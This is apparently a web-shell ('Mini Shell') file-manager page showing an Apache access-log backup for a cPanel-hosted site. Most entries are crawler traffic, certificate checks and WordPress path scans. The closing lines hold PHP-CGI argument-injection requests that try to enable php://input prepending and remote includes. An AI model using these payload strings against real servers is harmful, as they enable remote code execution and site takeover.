%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/lightco1/logs/
Upload File :
Create Path :
Current File : /home/lightco1/logs/torremato.lightco.com.au.bkup

203.143.88.233 - - [03/Dec/2025:01:22:19 +1100] "GET /.well-known/acme-challenge/5KJW__0TDFLRN6190KMBOI-DX7362WAF HTTP/1.1" 200 64 "-" "Cpanel-HTTP-Client/1.0"
203.143.88.233 - - [03/Dec/2025:01:22:19 +1100] "GET /.well-known/acme-challenge/AQJKUR7WNN9O65-78BQVM67C1Y6-LDC9 HTTP/1.1" 200 64 "-" "Cpanel-HTTP-Client/1.0"
209.38.34.239 - - [03/Dec/2025:03:00:18 +1100] "GET / HTTP/1.1" 403 258 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
209.38.34.239 - - [03/Dec/2025:03:00:19 +1100] "GET /favicon.ico HTTP/1.1" 500 678 "http://www.torremato.lightco.com.au/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
35.186.172.148 - - [03/Dec/2025:03:13:00 +1100] "GET / HTTP/1.1" 403 258 "-" "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)"
203.143.88.233 - - [03/Dec/2025:04:22:21 +1100] "GET /.well-known/acme-challenge/DUH67L3WQWU-V7T42NQRILYGOM77ESS3 HTTP/1.1" 200 64 "-" "Cpanel-HTTP-Client/1.0"
203.143.88.233 - - [03/Dec/2025:04:22:21 +1100] "GET /.well-known/acme-challenge/BSS_M4HDECPSA8DNH5YO0AHY36IJEG6C HTTP/1.1" 200 64 "-" "Cpanel-HTTP-Client/1.0"
52.167.144.67 - - [03/Dec/2025:05:03:14 +1100] "GET /robots.txt HTTP/1.1" 500 678 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.49 - - [03/Dec/2025:05:03:18 +1100] "GET /sitemap.xml.gz HTTP/1.1" 500 678 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
136.107.100.245 - - [03/Dec/2025:05:55:40 +1100] "HEAD /blog/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (Linux; Android 14; RMX3842) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.44 Mobile Safari/537.36"
136.107.100.245 - - [03/Dec/2025:05:55:41 +1100] "HEAD /backup/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.141 Safari/537.36"
136.107.100.245 - - [03/Dec/2025:05:55:41 +1100] "HEAD /new/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (Linux; Android 12; Redmi Note 11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.112 Mobile Safari/537.36"
136.107.100.245 - - [03/Dec/2025:05:55:41 +1100] "HEAD /old/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.90 Safari/537.36"
136.107.100.245 - - [03/Dec/2025:05:55:41 +1100] "HEAD / HTTP/1.1" 403 0 "-" "Mozilla/5.0 (Linux; Android 14; RMX3842) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.44 Mobile Safari/537.36"
136.107.100.245 - - [03/Dec/2025:05:55:42 +1100] "HEAD /wordpress/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (Linux; Android 14; Samsung SM-A546B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.14 Mobile Safari/537.36"
136.107.100.245 - - [03/Dec/2025:05:55:42 +1100] "HEAD /wp/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.90 Safari/537.36"
157.55.39.13 - - [03/Dec/2025:06:01:13 +1100] "GET /sitemap.xml.gz HTTP/1.1" 500 678 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
203.143.88.233 - - [03/Dec/2025:07:22:20 +1100] "GET /.well-known/acme-challenge/R-RE3ZZ8N_I1R4LC8YDF4R95UW8UXDZ8 HTTP/1.1" 200 64 "-" "Cpanel-HTTP-Client/1.0"
203.143.88.233 - - [03/Dec/2025:07:22:21 +1100] "GET /.well-known/acme-challenge/8F3X_X-BX7AB5OKYV41OFDTTJY0VNOXM HTTP/1.1" 200 64 "-" "Cpanel-HTTP-Client/1.0"
66.249.75.45 - - [03/Dec/2025:08:39:08 +1100] "GET /robots.txt HTTP/1.1" 500 678 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
203.143.88.233 - - [03/Dec/2025:10:22:17 +1100] "GET /.well-known/acme-challenge/4179MP-MAOJLZI7F16-3KZ9F97RLV44P HTTP/1.1" 200 64 "-" "Cpanel-HTTP-Client/1.0"
203.143.88.233 - - [03/Dec/2025:10:22:17 +1100] "GET /.well-known/acme-challenge/70SJHL0D6Y6T2CFS_F480UZ9WPBM_Q6Z HTTP/1.1" 200 64 "-" "Cpanel-HTTP-Client/1.0"
66.249.77.1 - - [03/Dec/2025:13:04:41 +1100] "GET /robots.txt HTTP/1.1" 500 678 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
203.143.88.233 - - [03/Dec/2025:13:22:17 +1100] "GET /.well-known/acme-challenge/RNLAUJJ6MQWOYL132ZOQGR34E88595I9 HTTP/1.1" 200 64 "-" "Cpanel-HTTP-Client/1.0"
203.143.88.233 - - [03/Dec/2025:13:22:17 +1100] "GET /.well-known/acme-challenge/T2AMHKS3PTEASAQ17VA9F3HH6D1V-QJ9 HTTP/1.1" 200 64 "-" "Cpanel-HTTP-Client/1.0"
203.143.88.233 - - [03/Dec/2025:16:22:17 +1100] "GET /.well-known/acme-challenge/N9QC8X7I6ZDPM--AHRDKKI6O9Q8T6T3C HTTP/1.1" 200 64 "-" "Cpanel-HTTP-Client/1.0"
203.143.88.233 - - [03/Dec/2025:16:22:17 +1100] "GET /.well-known/acme-challenge/UYJMHJWYI-OV8WD00J1QHFI388DUMS9T HTTP/1.1" 200 64 "-" "Cpanel-HTTP-Client/1.0"
203.143.88.233 - - [03/Dec/2025:19:22:17 +1100] "GET /.well-known/acme-challenge/B66Y0EZJO08UYFPJ_JZE5O0PP68C6AFQ HTTP/1.1" 200 64 "-" "Cpanel-HTTP-Client/1.0"
203.143.88.233 - - [03/Dec/2025:19:22:18 +1100] "GET /.well-known/acme-challenge/WBJVJPW2KRXVJRBNQ-FGR8BE1M0-KGAH HTTP/1.1" 200 64 "-" "Cpanel-HTTP-Client/1.0"
203.143.88.233 - - [03/Dec/2025:22:22:18 +1100] "GET /.well-known/acme-challenge/47L5_L0_VDSNMWZ4U4UW-KQ7GKULA3AO HTTP/1.1" 200 64 "-" "Cpanel-HTTP-Client/1.0"
203.143.88.233 - - [03/Dec/2025:22:22:18 +1100] "GET /.well-known/acme-challenge/DZO6TO8IJRGXJH7D-A-_6105YXLZFRTS HTTP/1.1" 200 64 "-" "Cpanel-HTTP-Client/1.0"
203.143.88.233 - - [04/Dec/2025:01:22:20 +1100] "GET /.well-known/acme-challenge/MQ9EJW6-BXCRLIKNJ2UBKNFKF_WSORRZ HTTP/1.1" 200 64 "-" "Cpanel-HTTP-Client/1.0"
203.143.88.233 - - [04/Dec/2025:01:22:21 +1100] "GET /.well-known/acme-challenge/7-FP7B9U8CN2M453-22A63CJWL-U06T9 HTTP/1.1" 200 64 "-" "Cpanel-HTTP-Client/1.0"
157.230.36.232 - - [04/Dec/2025:02:09:05 +1100] "GET / HTTP/1.1" 403 318 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
157.230.36.232 - - [04/Dec/2025:02:09:06 +1100] "GET / HTTP/1.1" 403 318 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
157.230.36.232 - - [04/Dec/2025:02:09:06 +1100] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 500 678 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
157.230.36.232 - - [04/Dec/2025:02:09:06 +1100] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 500 678 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
157.230.36.232 - - [04/Dec/2025:02:09:06 +1100] "GET /xmlrpc.php?rsd HTTP/1.1" 403 318 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
157.230.36.232 - - [04/Dec/2025:02:09:06 +1100] "GET /xmlrpc.php?rsd HTTP/1.1" 403 318 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
157.230.36.232 - - [04/Dec/2025:02:09:06 +1100] "GET / HTTP/1.1" 403 318 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
157.230.36.232 - - [04/Dec/2025:02:09:06 +1100] "GET / HTTP/1.1" 403 318 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
157.230.36.232 - - [04/Dec/2025:02:09:06 +1100] "GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1" 500 678 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
157.230.36.232 - - [04/Dec/2025:02:09:07 +1100] "GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1" 500 678 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
157.230.36.232 - - [04/Dec/2025:02:09:07 +1100] "GET /web/wp-includes/wlwmanifest.xml HTTP/1.1" 500 678 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
157.230.36.232 - - [04/Dec/2025:02:09:08 +1100] "GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1" 500 678 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
157.230.36.232 - - [04/Dec/2025:02:09:08 +1100] "GET /web/wp-includes/wlwmanifest.xml HTTP/1.1" 500 678 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
157.230.36.232 - - [04/Dec/2025:02:09:08 +1100] "GET /website/wp-includes/wlwmanifest.xml HTTP/1.1" 500 678 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
157.230.36.232 - - [04/Dec/2025:02:09:08 +1100] "GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1" 500 678 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
157.230.36.232 - - [04/Dec/2025:02:09:08 +1100] "GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1" 500 678 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
157.230.36.232 - - [04/Dec/2025:02:09:08 +1100] "GET /website/wp-includes/wlwmanifest.xml HTTP/1.1" 500 678 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
157.230.36.232 - - [04/Dec/2025:02:09:08 +1100] "GET /news/wp-includes/wlwmanifest.xml HTTP/1.1" 500 678 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
157.230.36.232 - - [04/Dec/2025:02:09:08 +1100] "GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1" 500 678 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
157.230.36.232 - - [04/Dec/2025:02:09:08 +1100] "GET /news/wp-includes/wlwmanifest.xml HTTP/1.1" 500 678 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
157.230.36.232 - - [04/Dec/2025:02:09:08 +1100] "GET /2018/wp-includes/wlwmanifest.xml HTTP/1.1" 500 678 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
157.230.36.232 - - [04/Dec/2025:02:09:08 +1100] "GET /2018/wp-includes/wlwmanifest.xml HTTP/1.1" 500 678 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
157.230.36.232 - - [04/Dec/2025:02:09:08 +1100] "GET /2019/wp-includes/wlwmanifest.xml HTTP/1.1" 500 678 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
157.230.36.232 - - [04/Dec/2025:02:09:08 +1100] "GET /shop/wp-includes/wlwmanifest.xml HTTP/1.1" 500 678 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
157.230.36.232 - - [04/Dec/2025:02:09:08 +1100] "GET /2019/wp-includes/wlwmanifest.xml HTTP/1.1" 500 678 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
157.230.36.232 - - [04/Dec/2025:02:09:09 +1100] "GET /shop/wp-includes/wlwmanifest.xml HTTP/1.1" 500 678 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
157.230.36.232 - - [04/Dec/2025:02:09:09 +1100] "GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1" 500 678 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
157.230.36.232 - - [04/Dec/2025:02:09:09 +1100] "GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1" 500 678 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
157.230.36.232 - - [04/Dec/2025:02:09:09 +1100] "GET /test/wp-includes/wlwmanifest.xml HTTP/1.1" 500 678 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
157.230.36.232 - - [04/Dec/2025:02:09:09 +1100] "GET /test/wp-includes/wlwmanifest.xml HTTP/1.1" 500 678 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
157.230.36.232 - - [04/Dec/2025:02:09:09 +1100] "GET /media/wp-includes/wlwmanifest.xml HTTP/1.1" 500 678 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
157.230.36.232 - - [04/Dec/2025:02:09:09 +1100] "GET /media/wp-includes/wlwmanifest.xml HTTP/1.1" 500 678 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
157.230.36.232 - - [04/Dec/2025:02:09:09 +1100] "GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.1" 500 678 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
157.230.36.232 - - [04/Dec/2025:02:09:09 +1100] "GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.1" 500 678 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
157.230.36.232 - - [04/Dec/2025:02:09:09 +1100] "GET /site/wp-includes/wlwmanifest.xml HTTP/1.1" 500 678 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
157.230.36.232 - - [04/Dec/2025:02:09:09 +1100] "GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1" 500 678 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
157.230.36.232 - - [04/Dec/2025:02:09:09 +1100] "GET /site/wp-includes/wlwmanifest.xml HTTP/1.1" 500 678 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
157.230.36.232 - - [04/Dec/2025:02:09:09 +1100] "GET /sito/wp-includes/wlwmanifest.xml HTTP/1.1" 500 678 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
157.230.36.232 - - [04/Dec/2025:02:09:09 +1100] "GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1" 500 678 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
157.230.36.232 - - [04/Dec/2025:02:09:09 +1100] "GET /sito/wp-includes/wlwmanifest.xml HTTP/1.1" 500 678 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
66.249.77.2 - - [04/Dec/2025:03:06:55 +1100] "GET /robots.txt HTTP/1.1" 500 678 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.1 - - [04/Dec/2025:04:19:49 +1100] "GET /robots.txt HTTP/1.1" 500 678 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
203.143.88.233 - - [04/Dec/2025:04:22:19 +1100] "GET /.well-known/acme-challenge/MCMFY0WMDT2J5HDI0_S8_AR0NVKHCUT3 HTTP/1.1" 200 64 "-" "Cpanel-HTTP-Client/1.0"
203.143.88.233 - - [04/Dec/2025:04:22:19 +1100] "GET /.well-known/acme-challenge/AP28ODADCQ9ORTKSDWNVC8SGV3K4UBWV HTTP/1.1" 200 64 "-" "Cpanel-HTTP-Client/1.0"
52.167.144.221 - - [04/Dec/2025:05:11:19 +1100] "GET /sitemap.xml HTTP/1.1" 500 678 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
66.249.77.1 - - [04/Dec/2025:05:28:49 +1100] "GET /robots.txt HTTP/1.1" 500 678 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
40.77.167.58 - - [04/Dec/2025:06:17:47 +1100] "GET /sitemap.xml HTTP/1.1" 500 678 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
206.189.154.240 - - [04/Dec/2025:06:24:57 +1100] "GET / HTTP/1.1" 403 258 "-" "Mozilla/5.0 (compatible; WP-Safe-Scanner/1.0)"
37.46.196.22 - - [04/Dec/2025:06:38:21 +1100] "GET / HTTP/1.1" 403 258 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
203.143.88.233 - - [04/Dec/2025:07:22:17 +1100] "GET /.well-known/acme-challenge/V7D_5CGF1_L4R-8V3_N0K_M90V2VPSSS HTTP/1.1" 200 64 "-" "Cpanel-HTTP-Client/1.0"
203.143.88.233 - - [04/Dec/2025:07:22:17 +1100] "GET /.well-known/acme-challenge/HPERZUKXBHG460WOYGBB6JATQLKDTV91 HTTP/1.1" 200 64 "-" "Cpanel-HTTP-Client/1.0"
206.189.154.240 - - [04/Dec/2025:07:28:10 +1100] "GET / HTTP/1.1" 403 258 "-" "Mozilla/5.0 (compatible; WP-Safe-Scanner/1.0)"
66.249.77.3 - - [04/Dec/2025:08:12:51 +1100] "GET /robots.txt HTTP/1.1" 500 678 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.1 - - [04/Dec/2025:09:34:54 +1100] "GET /robots.txt HTTP/1.1" 500 678 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.1 - - [04/Dec/2025:10:12:02 +1100] "GET /robots.txt HTTP/1.1" 500 678 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
203.143.88.233 - - [04/Dec/2025:10:22:15 +1100] "GET /.well-known/acme-challenge/9QXW3WBAXZ81QRGPLIA7KHC6ZI_TNSG3 HTTP/1.1" 200 64 "-" "Cpanel-HTTP-Client/1.0"
203.143.88.233 - - [04/Dec/2025:10:22:15 +1100] "GET /.well-known/acme-challenge/KU0Z0G7EW-YK13M9EO26RDXLT0U4UWGZ HTTP/1.1" 200 64 "-" "Cpanel-HTTP-Client/1.0"
207.46.13.107 - - [04/Dec/2025:11:56:16 +1100] "GET /administrator/language/en-GB/en-GB.com_messages.sys.ini HTTP/1.1" 200 420 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
203.143.88.233 - - [04/Dec/2025:13:22:18 +1100] "GET /.well-known/acme-challenge/U1PS9DSQOQ6C1OAHX_4O4CDBRE2054E0 HTTP/1.1" 200 64 "-" "Cpanel-HTTP-Client/1.0"
203.143.88.233 - - [04/Dec/2025:13:22:18 +1100] "GET /.well-known/acme-challenge/MN81_96FAUUJNNZI08-IMIUKK8YP8_6C HTTP/1.1" 200 64 "-" "Cpanel-HTTP-Client/1.0"
40.77.167.7 - - [04/Dec/2025:14:00:22 +1100] "GET /administrator/language/en-GB/en-GB.mod_custom.sys.ini HTTP/1.1" 200 387 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
203.143.88.233 - - [04/Dec/2025:16:22:15 +1100] "GET /.well-known/acme-challenge/QZ31JZI43X4CC6JAAPL6D1PNP0S5G4T1 HTTP/1.1" 200 64 "-" "Cpanel-HTTP-Client/1.0"
203.143.88.233 - - [04/Dec/2025:16:22:16 +1100] "GET /.well-known/acme-challenge/FHU22DS0CD6333KYDW4CLZRVTV-TZ6D7 HTTP/1.1" 200 64 "-" "Cpanel-HTTP-Client/1.0"
205.169.39.46 - - [04/Dec/2025:16:41:52 +1100] "GET / HTTP/1.1" 403 258 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
185.61.93.154 - - [04/Dec/2025:16:42:04 +1100] "GET / HTTP/1.1" 403 258 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2898.92 Safari/537.36"
185.61.93.154 - - [04/Dec/2025:16:42:05 +1100] "GET /index.php/component/users HTTP/1.1" 500 678 "http://torremato.lightco.com.au/" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2898.92 Safari/537.36"
40.77.167.27 - - [04/Dec/2025:18:15:44 +1100] "GET /administrator/language/en-GB/en-GB.plg_editors-xtd_module.sys.ini HTTP/1.1" 200 424 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
66.249.77.1 - - [04/Dec/2025:19:04:36 +1100] "GET /robots.txt HTTP/1.1" 500 678 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
203.143.88.233 - - [04/Dec/2025:19:22:17 +1100] "GET /.well-known/acme-challenge/-S0OLMALHMHXEG2O8MESU26I7OYCIG4S HTTP/1.1" 200 64 "-" "Cpanel-HTTP-Client/1.0"
203.143.88.233 - - [04/Dec/2025:19:22:17 +1100] "GET /.well-known/acme-challenge/S869MWY4PM2ID6J-VSSWK1QNR5W-AYHQ HTTP/1.1" 200 64 "-" "Cpanel-HTTP-Client/1.0"
37.46.196.22 - - [04/Dec/2025:19:32:55 +1100] "GET /index.php?%ADd+cgi.force_redirect%3D0+%ADd+cgi.redirect_status_env%3D0+%ADd+fastcgi.impersonate%3D1+%ADd+open_basedir%3D+%ADd+disable_functions%3D+%ADd+auto_prepend_file%3Dphp://input+%ADd+allow_url_include%3D1+%ADd+allow_url_fopen%3D1 HTTP/1.1" 500 678 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
37.46.196.22 - - [04/Dec/2025:19:32:57 +1100] "GET /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+cgi.redirect_status_env%3D0+%ADd+fastcgi.impersonate%3D1+%ADd+open_basedir%3D+%ADd+disable_functions%3D+%ADd+auto_prepend_file%3Dphp://input+%ADd+allow_url_include%3D1+%ADd+allow_url_fopen%3D1 HTTP/1.1" 500 678 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
37.46.196.22 - - [04/Dec/2025:19:32:59 +1100] "GET /php/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+cgi.redirect_status_env%3D0+%ADd+fastcgi.impersonate%3D1+%ADd+open_basedir%3D+%ADd+disable_functions%3D+%ADd+auto_prepend_file%3Dphp://input+%ADd+allow_url_include%3D1+%ADd+allow_url_fopen%3D1 HTTP/1.1" 500 678 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
37.46.196.22 - - [04/Dec/2025:19:33:03 +1100] "GET /cgi-bin/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+cgi.redirect_status_env%3D0+%ADd+fastcgi.impersonate%3D1+%ADd+open_basedir%3D+%ADd+disable_functions%3D+%ADd+auto_prepend_file%3Dphp://input+%ADd+allow_url_include%3D1+%ADd+allow_url_fopen%3D1 HTTP/1.1" 403 318 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
37.46.196.22 - - [04/Dec/2025:19:33:06 +1100] "GET /php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+cgi.redirect_status_env%3D0+%ADd+fastcgi.impersonate%3D1+%ADd+open_basedir%3D+%ADd+disable_functions%3D+%ADd+auto_prepend_file%3Dphp://input+%ADd+allow_url_include%3D1+%ADd+allow_url_fopen%3D1 HTTP/1.1" 403 318 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
37.46.196.22 - - [04/Dec/2025:19:33:09 +1100] "GET /php.exe?%ADd+cgi.force_redirect%3D0+%ADd+cgi.redirect_status_env%3D0+%ADd+fastcgi.impersonate%3D1+%ADd+open_basedir%3D+%ADd+disable_functions%3D+%ADd+auto_prepend_file%3Dphp://input+%ADd+allow_url_include%3D1+%ADd+allow_url_fopen%3D1 HTTP/1.1" 403 318 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
37.46.196.22 - - [04/Dec/2025:19:33:11 +1100] "GET /php/php.exe?%ADd+cgi.force_redirect%3D0+%ADd+cgi.redirect_status_env%3D0+%ADd+fastcgi.impersonate%3D1+%ADd+open_basedir%3D+%ADd+disable_functions%3D+%ADd+auto_prepend_file%3Dphp://input+%ADd+allow_url_include%3D1+%ADd+allow_url_fopen%3D1 HTTP/1.1" 500 678 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
